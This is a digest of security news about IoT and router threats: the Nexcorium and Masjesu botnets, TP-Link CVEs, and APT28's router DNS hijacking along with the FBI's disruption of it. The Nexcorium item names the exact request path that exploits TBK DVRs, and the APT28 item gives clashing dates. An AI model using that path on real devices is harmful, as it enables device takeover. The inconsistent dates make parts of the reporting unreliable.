Nexcorium Botnet Exploits Unpatched TBK DVRs and TP-Link Routers in Large-Scale DDoS Campaign A newly uncovered botnet campaign is exploiting a critical vulnerability in TBK digital video recorders (DVRs) to deploy Nexcorium, a Mirai-based malware designed for large-scale distributed denial-of-service (DDoS) attacks. The flaw, CVE-2024-3721 (CVSS 6.3), affects TBK’s DVR-4104 and DVR-4216 models, which remain widely deployed in small businesses, retail outlets, and surveillance systems due to outdated firmware and weak default credentials. Attackers exploit the vulnerability by sending a crafted HTTP request to the endpoint `/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___`, enabling unauthenticated remote code execution (RCE). Once compromised, the device is enslaved into the botnet, with Nexcorium displaying the message “nexuscorp has taken control” upon execution a deliberate signature left by the threat actors. Researchers at Fortinet’s FortiGuard Labs analyzed the campaign, confirming Nexcorium’s Mirai lineage, including an XOR-encoded configuration table, a watchdog module for persistence, and a DDoS attack module capable of flooding targets on command. The malware also targets end-of-life TP-Link Wi-Fi routers via CVE-2017-17215, expanding its reach by exploiting unpatched legacy hardware. Nexcorium employs multiple persistence mechanisms, including self-replicating binaries, C2 (command-and-control) communication channels, and Telnet brute-force attacks to propagate across networks. It supports multiple CPU architectures, allowing it to infect a broader range of IoT devices. A watchdog process ensures the malware restarts if terminated, while FNV-1a hashing verifies binary integrity, restoring itself if altered. The botnet’s dual-target strategy leveraging both TBK DVRs and TP-Link routers creates a geographically distributed attack infrastructure capable of generating massive, hard-to-block DDoS traffic. Since compromised devices operate behind real IP addresses, their traffic appears legitimate, complicating mitigation efforts. With no patch available for CVE-2024-3721, security researchers recommend replacing affected TBK DVRs and vulnerable TP-Link routers. Network segmentation and disabling unnecessary remote access to DVR management interfaces are also advised to limit exposure.

High-Severity Command Injection Flaw Disclosed in TP-Link Routers A critical authenticated command injection vulnerability, tracked as CVE-2026-5509 (CVSS v4.0: 8.5), has been identified in two TP-Link router models the Archer BE450 v1 and Archer BE7200 v1. The flaw allows attackers to execute arbitrary OS commands via the web management interface after gaining admin access, due to insufficient input sanitization in the backend. Exploitation requires network adjacency and high privileges but involves low complexity and no user interaction. Successful attacks could grant full device control, enabling threat actors to intercept network traffic, modify system configurations, or deploy unauthorized services posing significant risks to data privacy. The vulnerability mirrors past TP-Link router flaws, including CVE-2025-14756 (Archer MR600) and CVE-2023-1389 (Archer AX21), highlighting a recurring pattern of command injection risks in the Archer product line. Affected Models & Remediation The flaw impacts Archer BE450 v1 and BE7200 v1 running firmware versions earlier than 1.3.0 Build 20260416. TP-Link has released a patch, and users are advised to upgrade immediately. Notably, these models are not sold in the U.S., with distribution primarily in markets like Japan. While patching is the primary mitigation, administrators should also enforce strong credentials, restrict web management access, and disable remote management unless necessary. Given TP-Link’s history of similar vulnerabilities, regular firmware audits are recommended for ongoing security.

Russian APT28 Exploits Vulnerable Routers in Large-Scale Credential Theft Campaign The UK’s National Cyber Security Centre (NCSC) has issued a warning about two ongoing cyberespionage campaigns by the Russian hacking group APT28 (also known as Fancy Bear, Forest Blizzard, and Sofacy), which is linked to Russia’s GRU military intelligence unit. Since early 2024, APT28 has been hijacking vulnerable internet routers particularly TP-Link models to redirect traffic through attacker-controlled servers and steal credentials from targeted organizations. ### How the Attack Works APT28 has repurposed virtual private servers (VPS) as malicious DNS servers, intercepting high volumes of DNS requests from compromised routers. The group employs an opportunistic approach, initially casting a wide net to identify potential victims before narrowing down targets of intelligence value. In one campaign, APT28 exploited CVE-2023-50224, a vulnerability in TP-Link WR841N routers that allows unauthenticated attackers to extract credentials via crafted HTTP requests. By altering the DHCP DNS settings on these routers, the group forced downstream devices (such as laptops and phones) to resolve requests through their malicious servers. This enabled adversary-in-the-middle (AitM) attacks, allowing APT28 to harvest passwords, OAuth tokens, and other credentials from web and email services. Microsoft Threat Intelligence further reported that APT28 and its sub-group Storm-2754 have been compromising SOHO routers since at least August 2023, expanding their infrastructure to facilitate these attacks. ### Impact and Attribution The NCSC assesses that APT28’s operations are highly targeted, focusing on entities of strategic interest to Russian intelligence. While the initial router compromises appear broad, the group refines its focus at later stages to prioritize high-value victims. The stolen credentials could enable further unauthorized access, though the exact scope of follow-on attacks remains unclear. This campaign underscores the persistent threat posed by state-backed cyber actors leveraging common vulnerabilities in consumer-grade networking devices to conduct large-scale espionage.

U.S. Disrupts Russian GRU’s Global Router Hijacking Campaign Targeting Governments and Critical Infrastructure The U.S. Department of Justice (DOJ) announced on Tuesday that it had dismantled a years-long cyberespionage operation by Russia’s military intelligence agency, the GRU, which had hijacked thousands of small office and home office (SOHO) routers worldwide to intercept sensitive data. The campaign, active since at least 2024 (with evidence dating back to August 2025), exploited TP-Link routers to reroute DNS requests through Kremlin-controlled servers, enabling the theft of emails, passwords, and other confidential information from governments, critical infrastructure operators, and private networks. The FBI’s "Operation Masquerade" neutralized the threat by remotely resetting compromised routers and collecting forensic evidence, effectively severing Russia’s access. The operation followed a Microsoft report revealing that the GRU’s hacking group tracked as APT28, Fancy Bear, or Forest Blizzard had weaponized DNS hijacking to conduct adversary-in-the-middle (AiTM) attacks, particularly targeting Microsoft Outlook connections. An automated filtering system allowed the hackers to prioritize high-value targets, including three African government organizations, as well as entities in IT, telecommunications, and energy sectors. Microsoft warned that the scale of compromised routers could amplify future AiTM attacks, though no malware delivery or denial-of-service activity has been observed yet. The GRU’s tactics reflect an evolution in its playbook, marking the first time the group has used DNS hijacking at scale to exploit edge devices for large-scale surveillance. The disruption aligns with the FBI’s broader strategy to proactively counter state-sponsored cyber threats. Brett Leatherman, head of the FBI’s Cyber Division, emphasized the agency’s commitment to imposing costs on foreign adversaries targeting U.S. interests. The UK’s National Cyber Security Centre (NCSC) also issued an advisory on the campaign, underscoring the risks of unpatched or end-of-life networking equipment.

TP-Link, a prominent US router manufacturer with historical ties to China, faces a potential ban due to security concerns and ongoing investigations. Accusations revolve around the possibility of Chinese state-sponsored hackers compromising routers, and the company's obligation under Chinese law to provide sensitive information. This controversy has raised questions about TP-Link’s prices and market dominance, with fears that it might reflect a strategy to unfairly influence the US market. The company rebukes these concerns, highlighting its restructuring efforts, diverse manufacturing locations, and transparency with US investigators.

Masjesu Botnet: A Stealthy DDoS-for-Hire Threat Expands Its Reach Cybersecurity researchers have uncovered Masjesu, a sophisticated botnet operating as a DDoS-for-hire service since 2023. Marketed via Telegram under the alias XorBot, the malware targets IoT devices including routers, cameras, and gateways across multiple architectures, employing XOR-based encryption to evade detection. First documented by Chinese security firm NSFOCUS in December 2023 and linked to an operator known as synmaestro, Masjesu has since evolved. A 2024 update introduced 12 new exploits targeting devices from D-Link, Huawei, NETGEAR, TP-Link, and others, alongside enhanced DDoS flood modules. Researchers note its rapid growth, with attackers increasingly leveraging Telegram for recruitment and promotion. Trellix’s recent analysis reveals Masjesu’s focus on volumetric DDoS attacks, particularly against CDNs, game servers, and enterprises. The botnet’s infrastructure is heavily concentrated in Vietnam (nearly 50% of observed traffic), with additional activity in Ukraine, Iran, Brazil, Kenya, and India. Once deployed, the malware establishes persistence, disables competing processes, and connects to command servers to execute attacks. Masjesu also self-propagates by scanning for vulnerable devices, including Realtek routers via port 52869 a tactic previously used by botnets like JenX and Satori. Notably, the botnet avoids high-profile targets like the U.S. Department of Defense to minimize legal scrutiny, prioritizing long-term survival over mass infection. As IoT exploitation expands, Masjesu’s low-visibility approach and social media-driven recruitment underscore its adaptability as a persistent cyber threat.